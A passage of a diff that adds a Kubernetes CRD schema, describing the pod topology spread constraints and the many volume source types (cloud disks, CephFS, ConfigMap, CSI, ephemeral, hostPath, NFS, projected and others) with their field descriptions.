would make the ActualSkew(2-0) on zone1(zone2) violate MaxSkew(1). - if MaxSkew is 2, incoming pod can be scheduled onto any zone. When `whenUnsatisfiable=ScheduleAnyway`, it is used to give higher precedence to topologies that satisfy it. It''s a required field. Default value is 1 and 0 is not allowed.' + format: int32 + type: integer + topologyKey: + description: TopologyKey is the key of node labels. Nodes that have a label with this key and identical values are considered to be in the same topology. We consider each <key, value> as a "bucket", and try to put balanced number of pods into each bucket. It's a required field. + type: string + whenUnsatisfiable: + description: 'WhenUnsatisfiable indicates how to deal with a pod if it doesn''t satisfy the spread constraint. - DoNotSchedule (default) tells the scheduler not to schedule it. - ScheduleAnyway tells the scheduler to schedule the pod in any location, but giving higher precedence to topologies that would help reduce the skew. A constraint is considered "Unsatisfiable" for an incoming pod if and only if every possible node assignment for that pod would violate "MaxSkew" on some topology. 
For example, in a 3-zone cluster, MaxSkew is set to 1, and pods with the same labelSelector spread as 3/1/1: | zone1 | zone2 | zone3 | | P P P | P | P | If WhenUnsatisfiable is set to DoNotSchedule, incoming pod can only be scheduled to zone2(zone3) to become 3/2/1(3/1/2) as ActualSkew(2-1) on zone2(zone3) satisfies MaxSkew(1). In other words, the cluster can still be imbalanced, but scheduler won''t make it *more* imbalanced. It''s a required field.' + type: string + required: + - maxSkew + - topologyKey + - whenUnsatisfiable + type: object + type: array + x-kubernetes-list-map-keys: + - topologyKey + - whenUnsatisfiable + x-kubernetes-list-type: map + volumes: + description: 'List of volumes that can be mounted by containers belonging to the pod. More info: https://kubernetes.io/docs/concepts/storage/volumes' + items: + description: Volume represents a named volume in a pod that may be accessed by any container in the pod. + properties: + awsElasticBlockStore: + description: 'AWSElasticBlockStore represents an AWS Disk resource that is attached to a kubelet''s host machine and then exposed to the pod. More info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore' + properties: + fsType: + description: 'Filesystem type of the volume that you want to mount. Tip: Ensure that the filesystem type is supported by the host operating system. Examples: "ext4", "xfs", "ntfs". Implicitly inferred to be "ext4" if unspecified. More info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore TODO: how do we prevent errors in the filesystem from compromising the machine' + type: string + partition: + description: 'The partition in the volume that you want to mount. If omitted, the default is to mount by volume name. Examples: For volume /dev/sda1, you specify the partition as "1". Similarly, the volume partition for /dev/sda is "0" (or you can leave the property empty).' + format: int32 + type: integer + readOnly: + description: 'Specify "true" to force and set the ReadOnly property in VolumeMounts to "true". If omitted, the default is "false". More info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore' + type: boolean + volumeID: + description: 'Unique ID of the persistent disk resource in AWS (Amazon EBS volume). More info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore' + type: string + required: + - volumeID + type: object + azureDisk: + description: AzureDisk represents an Azure Data Disk mount on the host and bind mount to the pod. + properties: + cachingMode: + description: 'Host Caching mode: None, Read Only, Read Write.' + type: string + diskName: + description: The Name of the data disk in the blob storage + type: string + diskURI: + description: The URI of the data disk in the blob storage + type: string + fsType: + description: Filesystem type to mount. Must be a filesystem type supported by the host operating system. Ex. "ext4", "xfs", "ntfs". Implicitly inferred to be "ext4" if unspecified. + type: string + kind: + description: 'Expected values Shared: multiple blob disks per storage account Dedicated: single blob disk per storage account Managed: azure managed data disk (only in managed availability set). defaults to shared' + type: string + readOnly: + description: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts. 
+ type: boolean + required: + - diskName + - diskURI + type: object + azureFile: + description: AzureFile represents an Azure File Service mount on the host and bind mount to the pod. + properties: + readOnly: + description: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts. + type: boolean + secretName: + description: the name of secret that contains Azure Storage Account Name and Key + type: string + shareName: + description: Share Name + type: string + required: + - secretName + - shareName + type: object + cephfs: + description: CephFS represents a Ceph FS mount on the host that shares a pod's lifetime + properties: + monitors: + description: 'Required: Monitors is a collection of Ceph monitors More info: https://examples.k8s.io/volumes/cephfs/README.md#how-to-use-it' + items: + type: string + type: array + path: + description: 'Optional: Used as the mounted root, rather than the full Ceph tree, default is /' + type: string + readOnly: + description: 'Optional: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts. More info: https://examples.k8s.io/volumes/cephfs/README.md#how-to-use-it' + type: boolean + secretFile: + description: 'Optional: SecretFile is the path to key ring for User, default is /etc/ceph/user.secret More info: https://examples.k8s.io/volumes/cephfs/README.md#how-to-use-it' + type: string + secretRef: + description: 'Optional: SecretRef is reference to the authentication secret for User, default is empty. More info: https://examples.k8s.io/volumes/cephfs/README.md#how-to-use-it' + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + type: object + user: + description: 'Optional: User is the rados user name, default is admin More info: https://examples.k8s.io/volumes/cephfs/README.md#how-to-use-it' + type: string + required: + - monitors + type: object + cinder: + description: 'Cinder represents a cinder volume attached and mounted on kubelets host machine. More info: https://examples.k8s.io/mysql-cinder-pd/README.md' + properties: + fsType: + description: 'Filesystem type to mount. Must be a filesystem type supported by the host operating system. Examples: "ext4", "xfs", "ntfs". Implicitly inferred to be "ext4" if unspecified. More info: https://examples.k8s.io/mysql-cinder-pd/README.md' + type: string + readOnly: + description: 'Optional: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts. More info: https://examples.k8s.io/mysql-cinder-pd/README.md' + type: boolean + secretRef: + description: 'Optional: points to a secret object containing parameters used to connect to OpenStack.' + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + type: object + volumeID: + description: 'volume id used to identify the volume in cinder. More info: https://examples.k8s.io/mysql-cinder-pd/README.md' + type: string + required: + - volumeID + type: object + configMap: + description: ConfigMap represents a configMap that should populate this volume + properties: + defaultMode: + description: 'Optional: mode bits used to set permissions on created files by default. 
Must be an octal value between 0000 and 0777 or a decimal value between 0 and 511. YAML accepts both octal and decimal values, JSON requires decimal values for mode bits. Defaults to 0644. Directories within the path are not affected by this setting. This might be in conflict with other options that affect the file mode, like fsGroup, and the result can be other mode bits set.' + format: int32 + type: integer + items: + description: If unspecified, each key-value pair in the Data field of the referenced ConfigMap will be projected into the volume as a file whose name is the key and content is the value. If specified, the listed keys will be projected into the specified paths, and unlisted keys will not be present. If a key is specified which is not present in the ConfigMap, the volume setup will error unless it is marked optional. Paths must be relative and may not contain the '..' path or start with '..'. + items: + description: Maps a string key to a path within a volume. + properties: + key: + description: The key to project. + type: string + mode: + description: 'Optional: mode bits used to set permissions on this file. Must be an octal value between 0000 and 0777 or a decimal value between 0 and 511. YAML accepts both octal and decimal values, JSON requires decimal values for mode bits. If not specified, the volume defaultMode will be used. This might be in conflict with other options that affect the file mode, like fsGroup, and the result can be other mode bits set.' + format: int32 + type: integer + path: + description: The relative path of the file to map the key to. May not be an absolute path. May not contain the path element '..'. May not start with the string '..'. + type: string + required: + - key + - path + type: object + type: array + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap or its keys must be defined + type: boolean + type: object + csi: + description: CSI (Container Storage Interface) represents ephemeral storage that is handled by certain external CSI drivers (Beta feature). + properties: + driver: + description: Driver is the name of the CSI driver that handles this volume. Consult with your admin for the correct name as registered in the cluster. + type: string + fsType: + description: Filesystem type to mount. Ex. "ext4", "xfs", "ntfs". If not provided, the empty value is passed to the associated CSI driver which will determine the default filesystem to apply. + type: string + nodePublishSecretRef: + description: NodePublishSecretRef is a reference to the secret object containing sensitive information to pass to the CSI driver to complete the CSI NodePublishVolume and NodeUnpublishVolume calls. This field is optional, and may be empty if no secret is required. If the secret object contains more than one secret, all secret references are passed. + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + type: object + readOnly: + description: Specifies a read-only configuration for the volume. Defaults to false (read/write). 
+ type: boolean + volumeAttributes: + additionalProperties: + type: string + description: VolumeAttributes stores driver-specific properties that are passed to the CSI driver. Consult your driver's documentation for supported values. + type: object + required: + - driver + type: object + downwardAPI: + description: DownwardAPI represents downward API about the pod that should populate this volume + properties: + defaultMode: + description: 'Optional: mode bits used to set permissions on created files by default. Must be an octal value between 0000 and 0777 or a decimal value between 0 and 511. YAML accepts both octal and decimal values, JSON requires decimal values for mode bits. Defaults to 0644. Directories within the path are not affected by this setting. This might be in conflict with other options that affect the file mode, like fsGroup, and the result can be other mode bits set.' + format: int32 + type: integer + items: + description: Items is a list of downward API volume file + items: + description: DownwardAPIVolumeFile represents information to create the file containing the pod field + properties: + fieldRef: + description: 'Required: Selects a field of the pod: only annotations, labels, name and namespace are supported.' + properties: + apiVersion: + description: Version of the schema the FieldPath is written in terms of, defaults to "v1". + type: string + fieldPath: + description: Path of the field to select in the specified API version. + type: string + required: + - fieldPath + type: object + mode: + description: 'Optional: mode bits used to set permissions on this file, must be an octal value between 0000 and 0777 or a decimal value between 0 and 511. YAML accepts both octal and decimal values, JSON requires decimal values for mode bits. If not specified, the volume defaultMode will be used. This might be in conflict with other options that affect the file mode, like fsGroup, and the result can be other mode bits set.' + format: int32 + type: integer + path: + description: 'Required: Path is the relative path name of the file to be created. Must not be absolute or contain the ''..'' path. Must be utf-8 encoded. The first item of the relative path must not start with ''..''' + type: string + resourceFieldRef: + description: 'Selects a resource of the container: only resources limits and requests (limits.cpu, limits.memory, requests.cpu and requests.memory) are currently supported.' + properties: + containerName: + description: 'Container name: required for volumes, optional for env vars' + type: string + divisor: + anyOf: + - type: integer + - type: string + description: Specifies the output format of the exposed resources, defaults to "1" + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + resource: + description: 'Required: resource to select' + type: string + required: + - resource + type: object + required: + - path + type: object + type: array + type: object + emptyDir: + description: 'EmptyDir represents a temporary directory that shares a pod''s lifetime. More info: https://kubernetes.io/docs/concepts/storage/volumes#emptydir' + properties: + medium: + description: 'What type of storage medium should back this directory. The default is "" which means to use the node''s default medium. Must be an empty string (default) or Memory. 
More info: https://kubernetes.io/docs/concepts/storage/volumes#emptydir' + type: string + sizeLimit: + anyOf: + - type: integer + - type: string + description: 'Total amount of local storage required for this EmptyDir volume. The size limit is also applicable for memory medium. The maximum usage on memory medium EmptyDir would be the minimum value between the SizeLimit specified here and the sum of memory limits of all containers in a pod. The default is nil which means that the limit is undefined. More info: http://kubernetes.io/docs/user-guide/volumes#emptydir' + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + type: object + ephemeral: + description: "Ephemeral represents a volume that is handled by a cluster storage driver. The volume's lifecycle is tied to the pod that defines it - it will be created before the pod starts, and deleted when the pod is removed. \n Use this if: a) the volume is only needed while the pod runs, b) features of normal volumes like restoring from snapshot or capacity tracking are needed, c) the storage driver is specified through a storage class, and d) the storage driver supports dynamic volume provisioning through a PersistentVolumeClaim (see EphemeralVolumeSource for more information on the connection between this volume type and PersistentVolumeClaim). \n Use PersistentVolumeClaim or one of the vendor-specific APIs for volumes that persist for longer than the lifecycle of an individual pod. \n Use CSI for light-weight local ephemeral volumes if the CSI driver is meant to be used that way - see the documentation of the driver for more information. \n A pod can use both types of ephemeral volumes and persistent volumes at the same time. \n This is a beta feature and only available when the GenericEphemeralVolume feature gate is enabled." + properties: + volumeClaimTemplate: + description: "Will be used to create a stand-alone PVC to provision the volume. The pod in which this EphemeralVolumeSource is embedded will be the owner of the PVC, i.e. the PVC will be deleted together with the pod. The name of the PVC will be `<pod name>-<volume name>` where `<volume name>` is the name from the `PodSpec.Volumes` array entry. Pod validation will reject the pod if the concatenated name is not valid for a PVC (for example, too long). \n An existing PVC with that name that is not owned by the pod will *not* be used for the pod to avoid using an unrelated volume by mistake. Starting the pod is then blocked until the unrelated PVC is removed. If such a pre-created PVC is meant to be used by the pod, the PVC has to be updated with an owner reference to the pod once the pod exists. Normally this should not be necessary, but it may be useful when manually reconstructing a broken cluster. \n This field is read-only and no changes will be made by Kubernetes to the PVC after it has been created. \n Required, must not be nil." + properties: + metadata: + description: May contain labels and annotations that will be copied into the PVC when creating it. No other fields are allowed and will be rejected during validation. + type: object + spec: + description: The specification for the PersistentVolumeClaim. The entire content is copied unchanged into the PVC that gets created from this template. The same fields as in a PersistentVolumeClaim are also valid here. + properties: + accessModes: + description: 'AccessModes contains the desired access modes the volume should have. 
More info: https://kubernetes.io/docs/concepts/storage/persistent-volumes#access-modes-1' + items: + type: string + type: array + dataSource: + description: 'This field can be used to specify either: * An existing VolumeSnapshot object (snapshot.storage.k8s.io/VolumeSnapshot) * An existing PVC (PersistentVolumeClaim) If the provisioner or an external controller can support the specified data source, it will create a new volume based on the contents of the specified data source. If the AnyVolumeDataSource feature gate is enabled, this field will always have the same contents as the DataSourceRef field.' + properties: + apiGroup: + description: APIGroup is the group for the resource being referenced. If APIGroup is not specified, the specified Kind must be in the core API group. For any other third-party types, APIGroup is required. + type: string + kind: + description: Kind is the type of resource being referenced + type: string + name: + description: Name is the name of resource being referenced + type: string + required: + - kind + - name + type: object + dataSourceRef: + description: 'Specifies the object from which to populate the volume with data, if a non-empty volume is desired. This may be any local object from a non-empty API group (non core object) or a PersistentVolumeClaim object. When this field is specified, volume binding will only succeed if the type of the specified object matches some installed volume populator or dynamic provisioner. This field will replace the functionality of the DataSource field and as such if both fields are non-empty, they must have the same value. For backwards compatibility, both fields (DataSource and DataSourceRef) will be set to the same value automatically if one of them is empty and the other is non-empty. There are two important differences between DataSource and DataSourceRef: * While DataSource only allows two specific types of objects, DataSourceRef allows any non-core object, as well as PersistentVolumeClaim objects. * While DataSource ignores disallowed values (dropping them), DataSourceRef preserves all values, and generates an error if a disallowed value is specified. (Alpha) Using this field requires the AnyVolumeDataSource feature gate to be enabled.' + properties: + apiGroup: + description: APIGroup is the group for the resource being referenced. If APIGroup is not specified, the specified Kind must be in the core API group. For any other third-party types, APIGroup is required. + type: string + kind: + description: Kind is the type of resource being referenced + type: string + name: + description: Name is the name of resource being referenced + type: string + required: + - kind + - name + type: object + resources: + description: 'Resources represents the minimum resources the volume should have. More info: https://kubernetes.io/docs/concepts/storage/persistent-volumes#resources' + properties: + limits: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Limits describes the maximum amount of compute resources allowed. 
More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + requests: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Requests describes the minimum amount of compute resources required. If Requests is omitted for a container, it defaults to Limits if that is explicitly specified, otherwise to an implementation-defined value. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + type: object + selector: + description: A label query over volumes to consider for binding. + properties: + matchExpressions: + description: matchExpressions is a list of label selector requirements. The requirements are ANDed. + items: + description: A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: key is the label key that the selector applies to. + type: string + operator: + description: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed. + type: object + type: object + storageClassName: + description: 'Name of the StorageClass required by the claim. More info: https://kubernetes.io/docs/concepts/storage/persistent-volumes#class-1' + type: string + volumeMode: + description: volumeMode defines what type of volume is required by the claim. Value of Filesystem is implied when not included in claim spec. + type: string + volumeName: + description: VolumeName is the binding reference to the PersistentVolume backing this claim. + type: string + type: object + required: + - spec + type: object + type: object + fc: + description: FC represents a Fibre Channel resource that is attached to a kubelet's host machine and then exposed to the pod. + properties: + fsType: + description: 'Filesystem type to mount. Must be a filesystem type supported by the host operating system. Ex. "ext4", "xfs", "ntfs". Implicitly inferred to be "ext4" if unspecified. TODO: how do we prevent errors in the filesystem from compromising the machine' + type: string + lun: + description: 'Optional: FC target lun number' + format: int32 + type: integer + readOnly: + description: 'Optional: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts.' + type: boolean + targetWWNs: + description: 'Optional: FC target worldwide names (WWNs)' + items: + type: string + type: array + wwids: + description: 'Optional: FC volume world wide identifiers (wwids) Either wwids or combination of targetWWNs and lun must be set, but not both simultaneously.' 
+ items: + type: string + type: array + type: object + flexVolume: + description: FlexVolume represents a generic volume resource that is provisioned/attached using an exec based plugin. + properties: + driver: + description: Driver is the name of the driver to use for this volume. + type: string + fsType: + description: Filesystem type to mount. Must be a filesystem type supported by the host operating system. Ex. "ext4", "xfs", "ntfs". The default filesystem depends on FlexVolume script. + type: string + options: + additionalProperties: + type: string + description: 'Optional: Extra command options if any.' + type: object + readOnly: + description: 'Optional: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts.' + type: boolean + secretRef: + description: 'Optional: SecretRef is reference to the secret object containing sensitive information to pass to the plugin scripts. This may be empty if no secret object is specified. If the secret object contains more than one secret, all secrets are passed to the plugin scripts.' + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + type: object + required: + - driver + type: object + flocker: + description: Flocker represents a Flocker volume attached to a kubelet's host machine. This depends on the Flocker control service being running + properties: + datasetName: + description: Name of the dataset stored as metadata -> name on the dataset for Flocker should be considered as deprecated + type: string + datasetUUID: + description: UUID of the dataset. This is unique identifier of a Flocker dataset + type: string + type: object + gcePersistentDisk: + description: 'GCEPersistentDisk represents a GCE Disk resource that is attached to a kubelet''s host machine and then exposed to the pod. More info: https://kubernetes.io/docs/concepts/storage/volumes#gcepersistentdisk' + properties: + fsType: + description: 'Filesystem type of the volume that you want to mount. Tip: Ensure that the filesystem type is supported by the host operating system. Examples: "ext4", "xfs", "ntfs". Implicitly inferred to be "ext4" if unspecified. More info: https://kubernetes.io/docs/concepts/storage/volumes#gcepersistentdisk TODO: how do we prevent errors in the filesystem from compromising the machine' + type: string + partition: + description: 'The partition in the volume that you want to mount. If omitted, the default is to mount by volume name. Examples: For volume /dev/sda1, you specify the partition as "1". Similarly, the volume partition for /dev/sda is "0" (or you can leave the property empty). More info: https://kubernetes.io/docs/concepts/storage/volumes#gcepersistentdisk' + format: int32 + type: integer + pdName: + description: 'Unique name of the PD resource in GCE. Used to identify the disk in GCE. More info: https://kubernetes.io/docs/concepts/storage/volumes#gcepersistentdisk' + type: string + readOnly: + description: 'ReadOnly here will force the ReadOnly setting in VolumeMounts. Defaults to false. More info: https://kubernetes.io/docs/concepts/storage/volumes#gcepersistentdisk' + type: boolean + required: + - pdName + type: object + gitRepo: + description: 'GitRepo represents a git repository at a particular revision. DEPRECATED: GitRepo is deprecated. 
To provision a container with a git repo, mount an EmptyDir into an InitContainer that clones the repo using git, then mount the EmptyDir into the Pod''s container.' + properties: + directory: + description: Target directory name. Must not contain or start with '..'. If '.' is supplied, the volume directory will be the git repository. Otherwise, if specified, the volume will contain the git repository in the subdirectory with the given name. + type: string + repository: + description: Repository URL + type: string + revision: + description: Commit hash for the specified revision. + type: string + required: + - repository + type: object + glusterfs: + description: 'Glusterfs represents a Glusterfs mount on the host that shares a pod''s lifetime. More info: https://examples.k8s.io/volumes/glusterfs/README.md' + properties: + endpoints: + description: 'EndpointsName is the endpoint name that details Glusterfs topology. More info: https://examples.k8s.io/volumes/glusterfs/README.md#create-a-pod' + type: string + path: + description: 'Path is the Glusterfs volume path. More info: https://examples.k8s.io/volumes/glusterfs/README.md#create-a-pod' + type: string + readOnly: + description: 'ReadOnly here will force the Glusterfs volume to be mounted with read-only permissions. Defaults to false. More info: https://examples.k8s.io/volumes/glusterfs/README.md#create-a-pod' + type: boolean + required: + - endpoints + - path + type: object + hostPath: + description: 'HostPath represents a pre-existing file or directory on the host machine that is directly exposed to the container. This is generally used for system agents or other privileged things that are allowed to see the host machine. Most containers will NOT need this. More info: https://kubernetes.io/docs/concepts/storage/volumes#hostpath --- TODO(jonesdl) We need to restrict who can use host directory mounts and who can/can not mount host directories as read/write.' + properties: + path: + description: 'Path of the directory on the host. If the path is a symlink, it will follow the link to the real path. More info: https://kubernetes.io/docs/concepts/storage/volumes#hostpath' + type: string + type: + description: 'Type for HostPath Volume Defaults to "" More info: https://kubernetes.io/docs/concepts/storage/volumes#hostpath' + type: string + required: + - path + type: object + iscsi: + description: 'ISCSI represents an ISCSI Disk resource that is attached to a kubelet''s host machine and then exposed to the pod. More info: https://examples.k8s.io/volumes/iscsi/README.md' + properties: + chapAuthDiscovery: + description: whether to support iSCSI Discovery CHAP authentication + type: boolean + chapAuthSession: + description: whether to support iSCSI Session CHAP authentication + type: boolean + fsType: + description: 'Filesystem type of the volume that you want to mount. Tip: Ensure that the filesystem type is supported by the host operating system. Examples: "ext4", "xfs", "ntfs". Implicitly inferred to be "ext4" if unspecified. More info: https://kubernetes.io/docs/concepts/storage/volumes#iscsi TODO: how do we prevent errors in the filesystem from compromising the machine' + type: string + initiatorName: + description: Custom iSCSI Initiator Name. If initiatorName is specified with iscsiInterface simultaneously, new iSCSI interface <target portal>:<volume name> will be created for the connection. + type: string + iqn: + description: Target iSCSI Qualified Name. + type: string + iscsiInterface: + description: iSCSI Interface Name that uses an iSCSI transport. 
Defaults to 'default' (tcp). + type: string + lun: + description: iSCSI Target Lun number. + format: int32 + type: integer + portals: + description: iSCSI Target Portal List. The portal is either an IP or ip_addr:port if the port is other than default (typically TCP ports 860 and 3260). + items: + type: string + type: array + readOnly: + description: ReadOnly here will force the ReadOnly setting in VolumeMounts. Defaults to false. + type: boolean + secretRef: + description: CHAP Secret for iSCSI target and initiator authentication + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + type: object + targetPortal: + description: iSCSI Target Portal. The Portal is either an IP or ip_addr:port if the port is other than default (typically TCP ports 860 and 3260). + type: string + required: + - iqn + - lun + - targetPortal + type: object + name: + description: 'Volume''s name. Must be a DNS_LABEL and unique within the pod. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names' + type: string + nfs: + description: 'NFS represents an NFS mount on the host that shares a pod''s lifetime More info: https://kubernetes.io/docs/concepts/storage/volumes#nfs' + properties: + path: + description: 'Path that is exported by the NFS server. More info: https://kubernetes.io/docs/concepts/storage/volumes#nfs' + type: string + readOnly: + description: 'ReadOnly here will force the NFS export to be mounted with read-only permissions. Defaults to false. More info: https://kubernetes.io/docs/concepts/storage/volumes#nfs' + type: boolean + server: + description: 'Server is the hostname or IP address of the NFS server. More info: https://kubernetes.io/docs/concepts/storage/volumes#nfs' + type: string + required: + - path + - server + type: object + persistentVolumeClaim: + description: 'PersistentVolumeClaimVolumeSource represents a reference to a PersistentVolumeClaim in the same namespace. More info: https://kubernetes.io/docs/concepts/storage/persistent-volumes#persistentvolumeclaims' + properties: + claimName: + description: 'ClaimName is the name of a PersistentVolumeClaim in the same namespace as the pod using this volume. More info: https://kubernetes.io/docs/concepts/storage/persistent-volumes#persistentvolumeclaims' + type: string + readOnly: + description: Will force the ReadOnly setting in VolumeMounts. Default false. + type: boolean + required: + - claimName + type: object + photonPersistentDisk: + description: PhotonPersistentDisk represents a PhotonController persistent disk attached and mounted on kubelets host machine + properties: + fsType: + description: Filesystem type to mount. Must be a filesystem type supported by the host operating system. Ex. "ext4", "xfs", "ntfs". Implicitly inferred to be "ext4" if unspecified. + type: string + pdID: + description: ID that identifies Photon Controller persistent disk + type: string + required: + - pdID + type: object + portworxVolume: + description: PortworxVolume represents a portworx volume attached and mounted on kubelets host machine + properties: + fsType: + description: FSType represents the filesystem type to mount Must be a filesystem type supported by the host operating system. Ex. "ext4", "xfs". Implicitly inferred to be "ext4" if unspecified. + type: string + readOnly: + description: Defaults to false (read/write). 
ReadOnly here will force the ReadOnly setting in VolumeMounts. + type: boolean + volumeID: + description: VolumeID uniquely identifies a Portworx volume + type: string + required: + - volumeID + type: object + projected: + description: Items for all in one resources secrets, configmaps, and downward API + properties: + defaultMode: + description: Mode bits used to set permissions on created files by default. Must be an octal value between 0000 and 0777 or a decimal value between 0 and 511. YAML accepts both octal and decimal values, JSON requires decimal values for mode bits. Directories within the path are not affected by this setting. This might be in conflict with other options that affect the file mode, like fsGroup, and the result can be other mode bits set. + format: int32 + type: integer + sources: + description: list of volume projections + items: + description: Projection that may be projected along with other supported volume types + properties: + configMap: + description: information about the configMap data to project + properties: + items: + description: If unspecified, each key-value pair in the Data field of the referenced ConfigMap will be projected into the volume as a file whose name is the key and content is the value. If specified, the listed keys will be projected into the specified paths, and unlisted keys will not be present. If a key is specified which is not present in the ConfigMap, the volume setup will error unless it is marked optional. Paths must be relative and may not contain the '..' path or start with '..'. + items: + description: Maps a string key to a path within a volume. + properties: + key: + description: The key to project. + type: string + mode: + description: 'Optional: mode bits used to set permissions on this file. Must be an octal value between 0000 and 0777 or a decimal value between 0 and 511. YAML accepts both octal and decimal values, JSON requires decimal values for mode bits. If not specified, the volume defaultMode will be used. This might be in conflict with other options that affect the file mode, like fsGroup, and the result can be other mode bits set.' + format: int32 + type: integer + path: + description: The relative path of the file to map the key to. May not be an absolute path. May not contain the path element '..'. May not start with the string '..'. + type: string + required: + - key + - path + type: object + type: array + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap or its keys must be defined + type: boolean + type: object + downwardAPI: + description: information about the downwardAPI data to project + properties: + items: + description: Items is a list of DownwardAPIVolume file + items: + description: DownwardAPIVolumeFile represents information to create the file containing the pod field + properties: + fieldRef: + description: 'Required: Selects a field of the pod: only annotations, labels, name and namespace are supported.' + properties: + apiVersion: + description: Version of the schema the FieldPath is written in terms of, defaults to "v1". + type: string + fieldPath: + description: Path of the field to select in the specified API version. 
+ type: string + required: + - fieldPath + type: object + mode: + description: 'Optional: mode bits used to set permissions on this file, must be an octal value between 0000 and 0777 or a decimal value between 0 and 511. YAML accepts both octal and decimal values, JSON requires decimal values for mode bits. If not specified, the volume defaultMode will be used. This might be in conflict with other options that affect the file mode, like fsGroup, and the result can be other mode bits set.' + format: int32 + type: integer + path: + description: 'Required: Path is the relative path name of the file to be created. Must not be absolute or contain the ''..'' path. Must be utf-8 encoded. The first item of the relative path must not start with ''..''' + type: string + resourceFieldRef: + description: 'Selects a resource of the container: only resources limits and requests (limits.cpu, limits.memory, requests.cpu and requests.memory) are currently supported.' + properties: + containerName: + description: 'Container name: required for volumes, optional for env vars' + type: string + divisor: + anyOf: + - type: integer + - type: string + description: Specifies the output format of the exposed resources, defaults to "1" + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + resource: + description: 'Required: resource to select' + type: string + required: + - resource + type: object + required: + - path + type: object + type: array + type: object + secret: + description: information about the secret data to project + properties: + items: + description: If unspecified, each key-value pair in the Data field of the referenced Secret will be projected into the volume as a file whose name is the key and content is the value. If specified, the listed keys will be projected into the specified paths, and unlisted keys will not be present. If a key is specified which is not present in the Secret, the volume setup will error unless it is marked optional. Paths must be relative and may not contain the '..' path or start with '..'. + items: + description: Maps a string key to a path within a volume. + properties: + key: + description: The key to project. + type: string + mode: + description: 'Optional: mode bits used to set permissions on this file. Must be an octal value between 0000 and 0777 or a decimal value between 0 and 511. YAML accepts both octal and decimal values, JSON requires decimal values for mode bits. If not specified, the volume defaultMode will be used. This might be in conflict with other options that affect the file mode, like fsGroup, and the result can be other mode bits set.' + format: int32 + type: integer + path: + description: The relative path of the file to map the key to. May not be an absolute path. May not contain the path element '..'. May not start with the string '..'. + type: string + required: + - key + - path + type: object + type: array + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the Secret or its key must be defined + type: boolean + type: object + serviceAccountToken: + description: information about the serviceAccountToken data to project + properties: + audience: + description: Audience is the intended audience of the token. 
